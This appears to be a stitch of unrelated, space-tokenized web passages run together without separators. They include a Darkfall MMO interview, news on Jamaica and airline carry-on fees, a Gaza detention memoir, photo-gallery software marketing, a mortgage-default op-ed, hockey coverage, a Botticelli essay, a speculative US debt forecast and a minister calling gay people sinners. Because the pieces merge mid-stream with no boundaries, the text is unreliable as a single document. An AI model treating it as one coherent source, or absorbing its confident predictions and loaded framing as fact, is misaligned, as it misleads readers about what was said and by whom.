We were also surprised to find a healthy population of role - players during our events .
For reference , our average player age is 27 .
New players are also generally amazed that there ’s so much good will towards them in - game and they are helped a lot more often than they are attacked .
There exists a perception about the game that is very flawed and probably has to do more with some forum experiences rather than actual in - game experiences .
RPS : Okay – this is the thing which confuses me about many MMOs , and PvP MMOs with a unique end - game most of all .
The best things about Darkfall are things like the Sieges and ship warfare and similar .
They ’re stuff which you have to go through the early game to get to .
Why not bring some of this stuff forward ?
Is there a necessary part of the design which demands a character starts virtually powerless ?
Tasos Flambouras :
The same thing confuses us about MMOs and this is why we did n’t make Darkfall that way .
Take a brand new character , have him learn the basics for a few hours , join a guild , and go participate in a massive battle , a naval battle , or a siege .
It is conceivable that by his actions , he could become the MVP for his side .
A new character in Darkfall can go anywhere without restriction , he can use any equipment , man cannons , warhulks , sail the largest ship , resurrect or finish off any incapacitated player , scout , use a mount , deter with his presence ( nobody knows you ’re a newb ) , destroy a structure , capture a village , a city etc .
Take a group of 10 new characters in Darkfall : they can fend off and even kill a veteran .
Take as many new characters as you like in most other MMOs and they ca n’t even make a dent on one high level character .
Starting characters in Darkfall are far from being powerless .
I believe that they ’re probably the most powerful starting characters in any MMO with character progression .
RPS : Thanks for your time .
Darkfall is available to play now , complete with a free 14 - day trial .
KINGSTON : The Jamaican Prime Minister , Bruce Golding , vowed to restore law and order to his Caribbean nation as the death toll from violence triggered by a bid to capture an alleged drug lord hit 60 .
'' The government deeply regrets the loss of lives of members of the security forces , and those of innocent , law - abiding citizens who were caught in the cross fire , '' Mr Golding told the House of Representatives on Tuesday .
Hospital sources said more than 60 bodies so far were unloaded on Tuesday at a morgue in one of Kingston 's main hospitals after security forces stormed the stronghold of an alleged drug kingpin on Monday .
Mr Golding said the operations to hunt down '' illegal guns and persons who may be wanted by the police for criminal charges ' ' would continue as the government sought to extradite Christopher '' Dudus ' ' Coke to the United States to face trial .
He also vowed the security forces would '' bring an end to this state of an lawlessness and to restore law and calm ' ' amid reports that several homes had been torched .
The police have acknowledged only that 27 people have been killed - most of them civilians .
( Natural News )
An advisory panel to the U.S. Centers for Disease Control and Prevention ( CDC ) has recommended that every person be vaccinated for the seasonal flu yearly , except in a few cases where the vaccine is known to be unsafe .
" Now no one should say ' Should I or should n't I ? ' " said CDC flu specialist Anthony Fiore .
The Advisory Committee on Immunization Practices voted 11 - 0 with one abstention to recommend yearly flu vaccination for everyone except for children under the age of six months , whose immune systems have not yet developed enough for vaccination to be safe , and people with egg allergies or other health conditions that are known to make flu vaccines hazardous .
If accepted by the CDC , this recommendation will then be publicized to doctors and other health workers .
The CDC nearly always accepts the advisory committee 's recommendations .
Current CDC recommendations call for the yearly vaccination of all children over the age of six months , all adults over the age of 49 , health care workers , people with chronic health problems and anyone who cares for a person in one of these groups .
These recommendations cover 85 percent of the US population .
Excluded are adults between the ages of 19 and 49 who do not come into close contact with people in high - risk groups .
The new recommendation , if adopted , would close that gap , bringing an end to a 10 - year campaign by supporters of universal vaccination .
In the past , the advisory committee has been reluctant to recommend universal vaccination for fear that it might produce vaccine shortages that place members of higher risk groups in danger .
Yet even with current recommendations , only 33 percent of the public gets vaccinated every year , leaving millions of doses to be disposed of .
The H1N1 swine flu scare of the past year played a major role in the committee 's about face , both because the disease killed many people falling outside the current recommended vaccine demographic and because it raised public awareness of and demand for vaccines .
Sources for this story include : http://www.washingtonpost.com/wp-dyn/content...
The guard at the entrance cocked his rifle with a click - click that echoed around the cell block .
Then with his thumb he unlocked the safety catch , and begin swivelling the barrel of his Kalashnikov towards me .
I was standing behind a metal grille in a dark cell and had nowhere to hide .
He pointed the barrel towards my chest ; then , instead of firing , he pulled his gun slowly upward , and laughed .
It was day one of my incarceration in Gaza , where I was held in solitary confinement , denied books to read and a pen and paper , at times placed within earshot of violent torture , and threatened with imminent death several times .
It lasted less than a month in February and March this year – hardly comparable , I am aware , with , for example , the years of imprisonment and exile endured by Mónica González Mujica , the intrepid Chilean journalist who today ( World Press Freedom Day ) will receive a World Press Freedom award from Unesco .
But for me those 26 days seemed endless .
For most of that time I was convinced that death was the most likely outcome .
" You are not a witness , you are an accused ! " the military prosecutor had yelled at me when I was summoned into his office alongside the military court .
I had come to give evidence in support of Mohamed , a young man who was the subject of one of my films .
He had been part of a militant group that had fired numerous rockets into Israeli civilian areas .
I discovered when I returned to Gaza in 2009 that he had left the group , ensuring immediate antagonism from all militants , and had begun to criticise the efficacy of these attacks and the justification for them .
" Our rocket fire at their civilians only gives Israel the excuse and the justification to attack us , " he told me on camera .
Biggest risk
Was I right to film him ?
Did filming him put him in more danger than he already was ?
I would argue that it is the interviewee 's decision , not the journalist 's , provided he has had time to think about it and the risks have been made clear ; and in this case being filmed was more of a protection than a threat – repressive regimes worldwide fear negative publicity , and the biggest risk to dissidents is to be " disappeared " without anyone outside their borders taking any notice of the ( non - ) event .
Not only is Mohamed convinced I was right to have filmed him , according to his lawyer , but so too is his older brother , who is fighting to save Mohamed from execution .
Was I right to try to give evidence on his behalf , despite the risk of arrest ?
That is a dilemma that journalists occasionally face : should we try everything to protect the subjects of our films if they later get into deep trouble with the authorities ?
Of course we should .
Journalists have a duty not just to tell the truth in their media outlets , I would argue , but also to defend those who have given them their stories .
I had written to the military prosecutors , to the court and to the Hamas leadership stating that I would give evidence .
Banners around Gaza still proclaim : " We welcome foreigners and will keep them secure " – Hamas partly justifies its bloody overthrow of the rival Fatah forces in June 2007 on the basis of establishing law and order and security .
And it did succeed in getting Alan Johnston , the BBC Gaza correspondent who was held for four months by a militia not affiliated to Hamas , released .
But since then Hamas has locked up scores of journalists or closed down their news operations , although the foreign media have been left alone .
My six interrogators argued that I was a spy for MI6 , and possibly Mossad as well , and , as such , faced a mandatory death penalty .
I was even told I had been inside a Gaza City hospital during the Gaza - Israel war of December 2008 to January 2009 , seeking to discover if the Hamas leadership were hiding there .
In fact , of course , no journalists could get inside Gaza City during the fighting , and I arrived back in Gaza several days after the ceasefire .
My 21 - year - old daughter 's Facebook entry showed her paragliding in Cape Town – this became military training in Haifa , according to my interrogators .
I had filmed in the tunnels that link Gaza with Egypt , showing weapons smuggling .
Yes of course – and so have most of the world 's news organisations .
The allegations may seem laughable , but the chilling truth is that it really does n't matter how ludicrous they are : if a regime is hellbent on turning a journalist into a spy , it can simply put him on trial in a closed court , announce a verdict , list the now " proven " allegations , and lock the journalist up – or worse .
Who would know ?
My excellent Palestinian lawyer attended one seven - hour interrogation session , then was banned .
So too was the British consul .
The guilt or innocence of the supposed spy was of course irrelevant to the political calculation being made .
So was my past record of long - term support for the human rights of people across the Middle East and Africa .
My exposure , for example , of the awful death of one 12 - year - old boy in Gaza City during the recent war , shown on CNN , NBC News and Channel 4 News , ensures I still get hate mail from those who believe I have a sinister role as a producer of pro-Palestinian propaganda .
A key factor weighing against my release was the politics of opportunism .
Coinciding with my arrest was the assassination of a top Hamas official in Dubai , in which 12 faked British passports had been used .
The Hamas security services , internally accused of failing to protect their man , now had the chance to show strength – they could tell the locals , and their hardline Arab and Islamist backers , that they had now caught a " spy " and would execute him : scoreline Israel 1 Hamas 1 .
After 21 days , I was therefore amazed when a top Hamas official turned up at my jail .
He produced calling cards from Lord Steel and other British parliamentarians , who had come to Gaza against the advice of the British government ; at their request , he had asked to see me and get me released .
I was fortunate in having a long track record working for broadcasters such the BBC , Channel 4 News , al - Jazeera and Arte , and for newspapers such as the Times and the Guardian .
My detention was always likely to create some sort of western backlash , though oddly politicians and figures such as Archbishop Desmond Tutu appeared to put more pressure on Hamas than most media organs .
It seems Hamas 's desire to appear reasonable and credible in western eyes won the day – but at a cost to me .
The secret deal was to release me , but to warn me that personal details – my home address and the whereabouts of my children – would be released to " other agencies who might take a more aggressive view of things " if I revealed too much about my prison conditions or criticised Hamas .
In return they would drop the absurd claims of spying .
Journalistic freedom
In the end they reneged on the deal , even as I was playing my part at the exit from Gaza – by refusing to answer questions on my prison conditions or my opinion of my Hamas jailers .
I simply said my release was a " great victory " for the freedom of journalists to report fairly and accurately irrespective of the dangers .
I called on governments and armed groups to release more than 100 journalists who are held in jails across the world or have disappeared .
And for governments to take their duties seriously by making clear to such regimes or groups that there are consequences to this repression of journalistic freedom .
My contribution in future will be to fight for the rights of my colleagues still held in jail ; to fight to free , or save the lives of , those dissidents who are locked up after speaking to us , or face death , as does the reformed rocket - firer Mohamed ; and above all not to be cowed into silence .
Hamas , and all regimes and groups who behave repressively , can expect much more exposure from my pen and my camera .
And , I hope , from us all .
Paul Martin will be answering questions after the premiere of his short film Mohamed : Dissident Under Fire at the Everyman Cinema , Belsize Park , London , on Monday May 17 .
Book on 0870 066 4777
Home
Features
Buy Now
Demo
Examples
Testimonials
Custom Coding
Power Hosting
Resources
Contact Us STOCKBOX PHOTO ® GALLERY SOFTWARE
" The most powerful and versatile gallery application in its class ! "
No Commission on Sales
We do n't take any commission on your sales .
After all , they are YOUR sales !
Unlimited Admin and End-users
No limits set on the number of admin and end -users .
Unlimited Images and Categories
No limits set on the number of images and categories that can be managed .
Stockbox Photo® Gallery Software provides a turnkey solution for photographers , artists and artisans to display and sell their work online .
Create your own stock photo library or online proofing system and stop paying commissions to third party providers .
Our cross platform , server side software puts you back in control of your business .
Our software combines PHP and MySQL to produce an inherently fast and highly scalable solution .
A full featured search engine optimized online gallery maker and digital asset manager , that gives you the ability to auto generate thumbnails , watermark images and videos , utilize a dynamic user registration system , view images in a slideshow , user lightboxes , integrated Rights Managed pricing calculator , batch upload of media , advanced search features , display a variety of media formats ( images , video , audio ) , XMP format IPTC support , and offer a variety of products , including instant downloads , with a fully integrated shopping cart and secure online payment processing .
Stockbox Photo® also supports Credit , Duration and Package subscriptions .
Our software can be used out of the box as a stand alone website , or it can be easily added to an existing site .
The powerful web based admin control panel , gives you all that you will need to create a dynamic and exciting e-commerce enabled photo gallery and photo portfolio website .
WHAT'S INSIDE THE BOX ?
HTML5 Responsive Design
Blog manager feature
Newsletter manager feature
Signup / Login using Facebook
DMLAsearch integration
Google maps geotag feature
Maintenance Mode feature
Lightroom® plug - in ( beta )
Multi-photographer manager
Credit & Duration Subscriptions
Social media sharing
Facebook comments
Related media feature
Keyword Cloud
Share promotion during checkout
Generate PDF pages
Archive media feature
Generate download files dynamically
Generate display clips from video uploads
Watermark video clips from uploads
Custom media property fields
Shipping , category & user promos
Rights managed pricing calculator
Upload model & property release
Request a Quote feature
Keyword search logs
Supports over 30 payment gateways Affiliate sales module
Guest checkout option
News manager
Portfolio manager
Infinite thumbnail scrolling
Autofill thumbnails columns
SEO optimized features
CMS module to add pages
RSS Feeds
FTP syndication
Lightbox display bar
Multi-lightbox manager
Password protected galleries
Create Virtual CDs
Multi-language selector
Purchase using credits
Product packages
Sell product options ( frames )
Online user & visitor logs
Media & category stats
Image sitemap export
Remote storage of downloads
Quick view media ( mouseover )
Supports XMP IPTC format
Import / Display EXIF metadata
CSV export of sales reports PHP 7.2 Compatibility
Demo - Mobile Friendly
HTML5 Responsive Design
DMLAsearch is mega meta - search engine that enables buyers to perform keyword queries across dozens of licensable stock image providers .
Rating :
1
2
3
4
5 ( 64 votes ) Views : 70435
Rating :
1
2
3
4
5 ( 64 votes ) Views : 70435
What should I do today ?
Tags : copulation , yeah , canada , beer
As a result of the housing collapse , many Arizonans have seen their homes lose half of their value .
Many owe several hundred thousand dollars more than their homes are worth and are unlikely to dig out of their negative equity hole for decades .
For these homeowners , the American dream has become a nightmare - and their financial future is dim .
To compound the stress and anxiety , when they 've called their lender to work out a solution , they 've discovered that their lender wo n't even talk to them about a loan modification or a short sale as long as they are current on their mortgage .
With no help in sight , some of these underwater homeowners have decided that they would be better off letting go of their homes and have stopped making their mortgage payments .
Many have done so with the hope that defaulting will finally bring their lender to the table , but they are also resigned to the fact that they will likely lose their homes .
It has been suggested that such homeowners are immoral or , at least , irresponsible .
I disagree .
Before explaining why , it is important to emphasize that the decision to strategically default on a mortgage involves many complex , localized and individualized factors .
No one should decide to strategically default on their mortgage without sitting down first with a knowledgeable professional .
But let 's say that you 've actually sat down with a professional to do the calculations and have concluded that defaulting on your mortgage is the only way out of your financial nightmare .
Would it be immoral or irresponsible for you to do so ?
The arguments against homeowners intentionally defaulting on their mortgages generally center on the same three basic points .
First , underwater homeowners " promised " to pay their mortgages when they signed the mortgage contract .
Second , foreclosures lead to depreciation of neighborhoods , so underwater homeowners should hang on in order to help preserve their neighbors ' property values .
And , third , if all underwater homeowners defaulted , the housing market might crash .
Homeowners thus have a social obligation to pay their underwater mortgage in order to save the economy .
While all three of these arguments might hold some initial appeal , none holds water .
First , a mortgage contract , like all other contracts , is purely a legal document - not a sacred promise .
Think of it this way : when you got your cellphone , you likely signed a contract with your carrier in which you " promised " to pay a set monthly payment for two years .
Would it be immoral for you to break your contractual " promise " to pay for two years if you decided that you no longer needed the cellphone and elect instead to pay the early termination fee ?
Of course not .
The option to breach your " promise " to pay is part of the contract .
Though involving more money and something of great sentimental value to most people , a mortgage contract is simply a contract .
Like a cellphone contract , a mortgage contract explicitly sets out the consequences of a breach of contract .
In other words , the lender has contemplated in advance that the mortgagor might be unable or unwilling to continue making payments on his mortgage at some point and has decided in advance what fair compensation to the lender would be .
Specifically , the lender included clauses in the contract providing that the lender can foreclose on the property and keep any payments that have been made .
By writing this penalty into the contract , the lender has agreed to accept the property and any payments already made in lieu of the remaining payments .
Moreover , lenders charge Arizona borrowers on average an extra $ 800 per $ 100,000 borrowed because Arizona is a non-recourse state , meaning the lender cannot come after the borrower for a deficiency judgment on a purchase money loan .
In other words , borrowers in Arizona pay for the option to default on a purchase money loan without recourse .
The lender can only take the house .
That 's the agreement .
No one forced the lender to make the loan or sign the contract .
Indeed , the lender wrote it .
And , to be sure , the lender would n't hesitate to exercise his right to take a person 's house if it was in his financial interest to do so .
Concerns of morality or socially responsibility would n't be part of the equation .
In short , as far as the law is concerned , choosing to exercise the default option in a mortgage contract is no more immoral than choosing to cancel a cellphone contract .
Indeed , exercising the default option in your mortgage contract is similar to cashing in on an insurance policy .
You paid for it - and have you a right to exercise it .
But what about the argument that mortgage default hurts neighborhoods and the economy ?
Well , first , in a capitalist society , we do n't generally expect individuals to make personal economic decisions for the collective good .
Aside from this fact , however , it 's unfair , in my opinion , to ask underwater homeowners to prop up neighborhood property values , or the housing market , on their backs - especially if means sacrificing their ability to send their children to college or save adequately for their own retirement .
Why take homeowners , and not lenders , to task for putting their own financial interest ahead of the common good ?
Indeed , if lenders were less intransigent and more willing to negotiate , underwater homeowners would n't have to walk away from their homes in order to save themselves from financial ruin .
And we would n't have to worry about the fragile housing market crashing again .
Why it is that we speak of morality and social responsibility only when talking about the little guy , who must take his lumps for the common good , while financial institutions are free to protect their bottom line ?
It just can't be the case that it 's morally acceptable for banks to look out for their financial best interest , but it 's not OK for the average American do to exactly the same thing .
Brent T. White is an associate professor of law at the James E. Rogers College of Law at the University of Arizona .
He is the author of the paper " Underwater and Not Walking Away : Shame , Fear and the Social Management of the Housing Crisis . "
World
Johannesburg Journal ; South Africa 's New Poor : White and Bewildered
White poverty has become new and growing problem in South Africa , where many whites who benefitted from racist employment practices of past now find themselves in dire economic straits ; many face increasing competition for first time , particularly at lower rungs of work force , as companies that previously refused to hire blacks now seek them out in economy which is shedding thousands of jobs ; between 1995 and 1999 , ratio of unemployed whites increased from 3 .
By Rachel L. Swarns
( CNN ) --
If George Clooney 's character in " Up in the Air " had to fly Spirit Airlines , you have to wonder how the carry - on master would feel about having to pay a fee to bring his perfectly packed bag on board .
Like many air travelers , he clings to his luggage protectively and avoids handing it over at the ticket counter at all costs .
" Do you know how much time you lose by checking in ? " he asks in the movie .
" Thirty - five minutes a flight . "
But for the average passenger , even more important than skipping the dreaded baggage carousel is the chance to avoid paying extra for checked bags -- a fee now charged by most major air carriers .
All of which explains the outrage that followed when Spirit , a Florida - based low - cost carrier , announced last week that it would start charging its customers $ 20 to $ 45 for items they place in the overhead bins .
It 's the first airline in the United States -- and perhaps the world -- to do so .
CNN.com readers left hundreds of passionate comments in response to the news .
Many reacted angrily , vowing never to fly the airline and even calling for a boycott .
But some posted messages of support and expressed hope the policy would reduce the number of people who bring overstuffed bags on board and " hog " the overhead space .
" I have watched the growing abuse by passengers who are taking ever - larger items into the cabin ; turning to seated passengers to ask for help in lifting their leaden bags ; blocking the aisles while they turn , twist , shove , and bang their oversize carry - ons into crowded bins , " wrote one poster .
" I completely support these fees .
In fact , they should be doubled !
I am sick of all you people dragging half your house on board flights and delaying everyone that 's boarding just so you can fit your refrigerator in the overhead bin .
If you do n't like it ... DRIVE ! " vented another .
Then there 's the loud and colorful video that New Yorker Bob Thompson posted on YouTube in response to the Spirit carry - on fee in which he argues that people should n't fault the airline for coming up with the charge , but blame fellow travelers who do n't follow the rules instead .
YouTube.com : Watch Bob Thompson 's rant about carry - ons
No consistency
Beyond inconvenience , the growing number of heavy bags showing up on board is also a serious job safety issue for flight attendants .
More than 80 percent reported being hurt over the past year while dealing with items in overhead bins , according to a survey released last month by the Association of Flight Attendants .
The most common injuries were strained and pulled muscles in the neck , arms and upper back .
Spirit's new fee could be effective in reducing the number of carry - ons and the industry will be watching closely to see what impact it has , said Rene Foss , a flight attendant for more than 25 years and the spokeswoman for the union .
" At this point , it seems like anything is worth a try , I guess , because it is out of control on board the aircraft , " Foss said .
" Nobody wants to pay for checked luggage , so they bring it all on board the airplane and they 're bringing bags that are bigger and heavier .
Often times , the passenger is unable to actually lift their own bag over their head ... [ and ] they want the flight attendants to lift it . "
Passengers are also at risk of being hurt .
Half of the flight attendants in the survey reported seeing carry - on items falling from overhead bins .
If the compartments are overloaded , they can pop open during takeoff , Foss said .
She recalled working on a jumbo jet one time when she saw a bag with a duty - free bottle of liquor fall out and hit a passenger on the head , causing injury .
The Association of Flight Attendants is supporting a bill sponsored by Rep. Daniel Lipinski , D- Illinois , which would standardize the dimensions of carry - on baggage .
Currently , the airlines have varying policies , Foss said , and the luggage sizers at the gate that are supposed to weed out overstuffed bags often are n't used .
The union has also launched EndCarryOnCrunch.org , a Web site where people can read about the issue and leave comments .
Tips for packing lighter
The possibility of other airlines following Spirit 's lead has many travel experts looking at potential avoidance strategies and ways to pack more efficiently in general , some of which could be helpful for travelers now .
Here is a roundup of the advice :
• Pack a few clothes in your laptop bag , writes Tim Leffel on his Cheapest Destinations blog .
Under Spirit's new policy , each passenger will still be able to bring one personal item that fits under a seat for free , such as a laptop computer , so the bag can give you a bit of room to maneuver .
• Downsize your contents by sucking the air out of your sweaters and T - shirts -- no kidding .
Airfarewatchdog.com put small and medium size clothing into vacuum freezer bags and used a hand pump to suck out the air .
It took just seconds and the testers were very happy with the results .
" Suddenly your big pile of clothes can fit into a much smaller space .
It 's pretty amazing , " wrote George Hobica , president of Airfarewatchdog.com .
• Do n't bring anything and ship your stuff ahead instead if the distance is n't too big and the bag is n't too heavy .
A mail drop with the U.S. Postal Service can be an attractive alternative to lugging your bag around , said Genevieve Shaw Brown , senior editor at Travelocity .
For example , it would cost about $ 26 to send a 25 - pound bag with the dimensions of a typical carry - on from Atlanta , Georgia , to Miami , Florida , via Priority Mail , which arrives in two days .
The price drops to $ 17 if you can wait a few days longer .
Have you seen people going to the extreme with carry - ons ?
What are your tips for packing light ?
Let us know in the comment section below .
I got an amazing collection of gifts !
A large bag of one of my favourite ever sweets Flying Saucers !
A bag of Mars Planets and a dvd called Moon staring Sam Rockwell which I have n't seen yet but looks like something I would really enjoy .
To top it off was a cd with the Hitch - hikers Guide on it :)
I do n't know how but lotte has managed to combine my love of all things Spacey to make a great Arbitrary Day .
Thank you !!
The mars planets were already nom nom'ed by the time I took this photo .
2010 — 2020 : The Moments That Defined the Decade in Electronic Music Recapping 10 years that gave us EDM , post- ironic parodies , and cancel culture , as well as a handful of half - decent tunes .
This morning , the Edmonton Oilers announced that they had called a press conference for noon MDT .
The internet lit up with speculation about draft announcements and trades .
More savvy observers speculated that this would be the end of Pat Quinn 's reign in Edmonton .
When Steve Tambellini strode the the podium at Rexall Place today with Tom Renney at his side , the presser 's purpose was revealed before anyone uttered a word .
Pat Quinn has been pushed aside , or upstairs , or wherever he 's going as a " Senior Advisor " and Tom Renney has been handed the wheel of the Edmonton Oilers ramblin ' wreck .
This decision should come as no surprise to Oiler fans .
While the name Pat Quinn carried a large amount of cachet , the decision was foolish , especially for a team that was constructed like the Oilers .
The team lacked real , honest - to - goodness NHL forwards and needed a coach that was willing to chase match - ups all over the ice , every night , all season long .
Quinn was not that guy .
Jonathan said at the time of the hiring that it was n't a good one :
Quinn 's an old - school coach ; line - matching is not one of his strong suits and while Craig MacTavish ( like virtually every other NHL coach ) preferred veterans Quinn has an even stronger bias in that direction .
I think this is a poor choice , and not one suited to the current roster .
I echoed Jonathan 's sentiments in September in the fan roundtable ; hiring Quinn was n't a good idea :
I think it depends on how the match - ups are handled .
If Quinn goes to his traditional management style , at least two lines ( given the current roster makeup ) are going to be overwhelmed by a tactician .
The team is going to be in trouble at evens .
And Quinn 's strategies played out exactly as we predicted .
Quinn rolled his lines and defensive pairings all year long and ended up with some terrible results , whacky underlying stats , and may have stunted the development of some of his younger players .
In February , when all was lost , Scott even hoped for Ken Hitchcock to ride in and save the team , but alas , there was no savior .
Quinn made strange decisions throughout the year .
Renney 's strengths with the Rangers were the success of his penalty kill and the ferocious nature of his matchups , both at forward and on defense .
Even if Quinn were to roll his lines , the thinking was that Renney would at least improve the penalty kill to offset some of the damage from 2008 - 2009 .
Instead , Quinn decided that Kelly Buchbeger should run the penalty kill and Tom Renney should coach the defense .
But even that was in question .
Renney 's hallmark in New York was his attention to match - ups .
He ran power - versus - power and gave the easy zone starts to the kids and less defensively - skilled players .
He did not roll lines or pairings .
In Edmonton , it was the opposite .
Scott randomly tracked the pairings coming over the boards for the Oilers this season and it was like the Alberta waltz : 1-2-3-1-2-3-1-2- 3 .
Rather than give the heavy minutes to Sheldon Souray , Steve Staios , Tom Gilbert , and Denis Grebeshkov , he spread them around and it showed .
Rather than have rookies starting in the offensive zone , he ended up with Taylor Chorney somehow leading all defensemen in the league in largest percentage of defensive zone starts .
This goes against everything that Renney did in New York .
It 's pretty clear that Renney was n't in charge of strategy or tactics and it's likely why Tambellini " accelerated his succession plan " as he said in the press conference .
It was a mistake to hire Quinn from the beginning , and Tambellini 's accelerated succession plan is an admittance of that .
During Renney 's time in New York , he ran a tight ship .
Scott Gomez took on a power - versus - power role and Chris Drury and Blair Betts helped out by taking some defensive zone faceoffs .
Brandon Dubinsky was protected from tough minutes and tough faceoffs .
He gave the bulk of the offensive zone faceoffs to his offensive superstars like Jaromir Jagr .
He hard matched his lines and his pairings night in and night out .
His penalty kill rotated five defensemen and three pairs of forwards .
He brought along young players like Marc Staal , Dan Girardi , Brandon Dubinsky and Ryan Callahan by not exposing them to minutes that were too difficult to handle , and it paid off .
How will this look in Edmonton ?
Shawn Horcoff is going to take the Scott Gomez role of the power - versus - power center .
Ales Hemsky , Sam Gagner and Taylor Hall / Tyler Seguin are going to get loads of offensive zone faceoffs .
Young players like Magnus Paajarvi - Svensson or Jordan Eberle will be protected from tough minutes and Taylor Chorney will not lead the league in defensive zone faceoffs - in fact , he might lead the league in offensive zone faceoffs .
The penalty kill should have structure to it for the first time in three years and Renney will likely hand the power play duties to Wayne Fleming or someone similar .
With Renney in charge , he may also want to reach back to New York for a piece or two .
Dan Girardi was a pet project of Renney 's and his play has fallen off sharply without Renney 's guiding hand .
He 's on the outs in New York now and if Renney has some say in personnel , there 's a strong possibility that Girardi might end up in Edmonton .
He 'll also likely request a faceoff - winning center with some penalty - killing experience ( Finally ! ) to take the role of Blair Betts .
All - in - all , it 's a good day for Oiler fans .
They 've upgraded at the coaching position and the General Manager admitted he made a mistake , without admitting he made a mistake .
Let 's hope that he 's learned some lessons as he moves into the draft and free agency .
It ’s been awhile since we posted some good demotivational posters .
Â
That being said , we ’ve decided to compile a list of our favorite inappropriate demotivators for your nostalgic viewing pleasure .
Warning :
The following material may be sexist , racist , and boner inducing .
Â Proceed with caution .
The Florentine Renaissance weaver of floral fantasies Sandro Botticelli is a magical artist .
Just to look at his masterpiece the Primavera is to have your spirits lifted , as if he knows how to release pleasure - giving chemicals in the human brain by particular combinations of colour and form .
The question is , how literal is the magic in Botticelli 's art ?
Are his paintings allegories , or entertainments , or something more – how shall we say this – practical ?
A fascinating new idea about Botticelli's alluring idyll Venus and Mars in London 's National Gallery gives an old debate a contemporary twist .
According to art historian David Bellingham , a strange plant pawed by a young satyr who plays about , clad in the discarded cuirass of Mars , at the bottom right of the panel , is a specimen of the hallucinogenic Datura stramonium , also known as " poor man 's acid " .
According to this latest theory the pacified and disarmed war god Mars has actually been drugged by Venus , deity of love , who reclines wide awake and clothed beside his slumberous nude form .
This is not the first attempt to interpret Venus and Mars as something more tangible and efficacious than just a visualisation of Greek myth .
In the past , the hermetic magical thought of the Florentine intellectual Marsilio Ficino was adduced by the Warburg Institute scholars EH Gombrich and Frances Yates to see Botticelli 's paintings as " talismans " : magical artefacts designed to actually exert benevolent effects on the beholder .
Personally I think both theories are very plausible .
Botticelli 's paintings do suggest real magic , real eroticism – they have an occult quality .
Nor would it be surprising if the Medici court circles who supported his art at this time ( Venus and Mars was painted about 1485 ) were taking love drugs .
Such potions were well - known and were taken seriously in the Renaissance – you can see an aphrodisiac bottle decorated with snogging lovers in the Renaissance galleries at the V&A .
Those same galleries boast a Florentine mirror from this period that has a Medici emblem and is emblazoned with Venus and Mars – associating the theme with actual bedrooms , not just classicist studies .
Love is a drug , and Botticelli painted its effects with rare conviction .
It would hardly be surprising to find a hallucinogenic on the shelves of his art 's life - giving pharmacy .
Total US debt just hit $ 12,987,823,000,000 , $ 13 billion from lucky $ 13 trillion .
As next week the US Treasury is auctioning off another gross $ 140 + billion in Bonds , we will pass this totally irrelevant resistance level on May 25 , when Timmy issues another $ 42 billion of 2 Year Notes .
The next important support level of $ 14 trillion will be surpassed around the time the Democrats get destroyed in the mid-term elections , while the statutory debt limit of $ 14.3 trillion will likely have to be raised in January 2011 by a new republican majority , an action which will promptly reduce popular republican support following their ladnslide election victory , thus starting the pointless D->R->D->R etc cycle all over again .
Also , at approximately that time headlines that US debt is now 100 % of GDP will bring the US bond vigilantes out of hibernation and will send US interest rates soaring , assisted by Ben Bernanke 's most recent announcement that the Fed will is once again " forced " to purchase another $ 1.5 trillion in treasuries and mortgages .
Stepping away from the Ouija board , we also notice that so far in April , the Treasury has rolled another unsustainable amount of Treasuries : $ 397 billion , of which $ $ 359 billion is in Bills .
The clock to the US ' hyperstagflationary period is now ticking louder than ever
Interstate 35 has reopened in both directions after a fatal four - vehicle crash in Lakeville that included a semi hauling a load of bees .
Minnesota State Patrol Lt. Eric
Roeske said one person was killed when two passenger cars were hit by two semis , including the one that was filled with crates of bees .
A second person was airlifted to a hospital .
A portion of northbound I - 35 was closed at Highway 70 in Lakeville as authorities tried to arrange for someone to contain the bees .
Firefighters were using hoses to keep them at bay , Roeske said .
Roeske says all lanes reopened by a little after 7 p.m. Monday .
A closed southbound lane reopened earlier in the afternoon .
Fortunately , he said , most of the bee crates remained intact .
But the bees were making it difficult for rescue workers to do their job .
" I can't imagine what would have happened if all these things were loose , " Roeske said , adding that he believes someone in a bee suit will have to clean up the mess before authorities can clear up the crash scene .
( The Associated Press contributed to this report . )
DETROIT --
The Detroit Red Wings made qualifying offers to nine players before Monday ’s deadline , retaining their rights when they become restricted free agents Thursday .
In addition to making qualifying offers , as expected , to Darren Helm , Justin Abdelkader , Patrick Eaves , Drew Miller and Derek Meech , the Red Wings also qualified defensemen Sergei Kolosov and Ole- Kristian Tollefsen , forward Jamie Tardif and goaltender Daniel Larsson .
They severed ties with forwards Evan McGrath and Johan Ryno , who were not extended qualifying offers and now are unrestricted free agents .
The Red Wings are not close signing any of their restricted free agents , but all -- except for the Europe - bound Tollefsen and Larsson -- eventually will be re-signed .
“ We ’ve had discussions , but it ’s still early in the process , ’’ Red Wings assistant general manager Jim Nill said .
“ It gets more serious when you get closer to the deadline ( July 15 , when qualifying offers expire ; the sides can continue contract talks ) .
In the next two weeks it ’ll pick up more . ’’
Restricted free agents have limited options .
They can accept their qualifying offer ( one year at a 10 percent raise from their 2009 - 10 salary ) , negotiate a longer - term deal with the club , seek an offer sheet from another team after July 1 ( highly unlikely , since their club has the right to match or receive a draft pick as compensation ) or play in Europe .
Eaves , Miller and Meech have salary arbitration rights but do n’t have a strong enough case to file by the July 5 deadline .
The Red Wings are approximately $ 5.2 million under the salary cap ( $ 59.4 million ) .
Signing Helm , Abdelkader , Eaves , Miller and Meech will cost roughly between $ 3.2 million and $ 3.5 million in cap space .
Meech remains a candidate to be traded before the season .
Tollefsen , acquired from Philadelphia in February in the Ville Leino trade , and Larsson informed the club last month that they will play in Sweden next season , where they will earn more money than if they had remained in the AHL with the Grand Rapids Griffins .
The Red Wings will retain their NHL rights .
The 6 - foot - 5 , 209 - pound Ryno once was a promising prospect .
But he left Grand Rapids midway through the 2007 - 08 season to return to his native Sweden .
He came back to North America last season and played in five preseason games with the Red Wings .
But he again bolted for Sweden rather than play in Grand Rapids .
McGrath never developed during four years in the Red Wings ’ system .
He was assigned to Syracuse ( AHL ) late last season , his fourth with the Griffins .
I have spent much time as a mental health professional and as a Christian minister helping and lovingly caring for people identifying themselves as “ gay . ”
My hero is Jesus Christ who loves even the culturally despised people , including sexual sinners and prostitutes .
Like Jesus Christ , I deliberately spend time with sinners with the loving goal to try to help them .
Mark 2:16 - 17 reads , “ 16 When the teachers of the law who were Pharisees saw him eating with the " sinners " and tax collectors , they asked his disciples : " Why does he eat with tax collectors and ' sinners ' ? "
17 On hearing this , Jesus said to them , " It is not the healthy who need a doctor , but the sick .
I have not come to call the righteous , but sinners . "
